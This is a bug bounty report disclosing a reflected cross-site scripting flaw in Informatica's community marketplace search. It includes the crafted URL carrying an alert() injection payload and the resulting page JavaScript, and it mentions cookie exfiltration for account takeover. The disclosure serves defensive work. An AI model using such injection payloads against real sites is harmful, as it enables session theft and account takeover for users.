Informatica: XSS in Search Communities Function

2015-02-09T18:51:57
ID H1:47235
Type hackerone
Reporter ddworken
Modified 2015-07-31T23:09:46

Description

When you search for a URL on the communities page, you visit a URL that looks like this https://community.informatica.com/community/marketplace/search/?blkCatIds=free+apps&view=solution

By replacing the search query with html ";alert(0);t="

and making the final URL:

https://community.informatica.com/community/marketplace/%22;alert(0);t=%22/?blkCatIds=free+apps&view=solution

You make the page's javascript code, turn into

``` javascript var profileShortUrl = "/profile-short.jspa"; var profileLoadingTooltip = "Loading user profile"; var profileErrorTooltip = "There was an error loading that profile information.";

    var projectChooserUrl = "/community/marketplace/";
    alert(0);
    t="/project-chooser!input.jspa";

    var containerShortUrl = "/container-short.jspa";
    var containerLoadingTooltip = "Loading place information.";
    var containerErrorTooltip = "There was an error loading that place information.";

    var videoShortUrl = "/view-video-short.jspa";
    var videoLoadingTooltip = "video.tooltip.loading";
    var videoErrorTooltip = "video.tooltip.error";
    var _jive_video_picker__url = "?container=1&containerType=14";
    var followErrorMessage = "An internal error ocurred while following the project or space.";

    (function() {
        var originalWrite = document.write;
        document.write = function() {
            if(typeof $j != 'undefined' && $j.isReady) {
                console.warn("document.write called after document was loaded: ", arguments);
            }
            else {
                // In IE before version 8 `document.write()` does not
                // implement Function methods, like `apply()`.
                return Function.prototype.apply.call(originalWrite, document, arguments);
            }
        }
    })();

``` This is an example of a injected javascript XSS vulnerability. With this, one can also exfiltrtrate user's cookies to another server allowing account takeovers.